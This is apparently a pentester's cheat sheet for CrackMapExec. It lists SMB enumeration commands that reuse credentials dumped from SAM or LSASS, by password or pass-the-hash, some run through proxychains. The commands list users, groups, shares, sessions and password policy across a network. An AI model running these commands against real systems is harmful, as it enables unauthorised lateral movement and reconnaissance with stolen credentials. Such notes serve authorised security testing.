CrackMapExec
When to Use
Useful post-compromise if you've dumped hashes from SAM or LSASS or obtained cleartext passwords, you can then pass these credentials around the network to enumerate information such as:
Enumerate Users, Groups, and Computers
# Password authentication
crackmapexec smb CIDR/IP -d domain.tld -u username -p 'password' --users --groups --computers
# Via proxy host
proxychains -q crackmapexec smb CIDR/IP -d domain.tld -u username -p 'password' --users --groups --computers
# Pass the hash
crackmapexec smb CIDR/IP -d domain.tld -u username -H lm-hash:nt-hash --users --groups --computers
# Via proxy host
proxychains -q crackmapexec smb CIDR/IP -d domain.tld -u username -H lm-hash:nt-hash --users --groups --computers
Enumerate Everything
Note: some enumeration methods may fail depending on the privilege level of the user you're authenticating as. Also, you can add/remove parameters from the example command. For example, if you don't want to enumerateĀ disks, then remove theĀ --disks
option.
# Password authentication
crackmapexec smb CIDR/IP -d domain.tld -u username -p 'password' \
--shares \
--sessions \
--disks \
--loggedon-users \
--users \
--groups \
--computers \
--local-groups \
--pass-pol
# Pass the hash
crackmapexec smb CIDR/IP -d domain.tld -u username -H lm-hash:nt-hash \
--shares \
--sessions \
--disks \
--loggedon-users \
--users \
--groups \
--computers \
--local-groups \
--pass-pol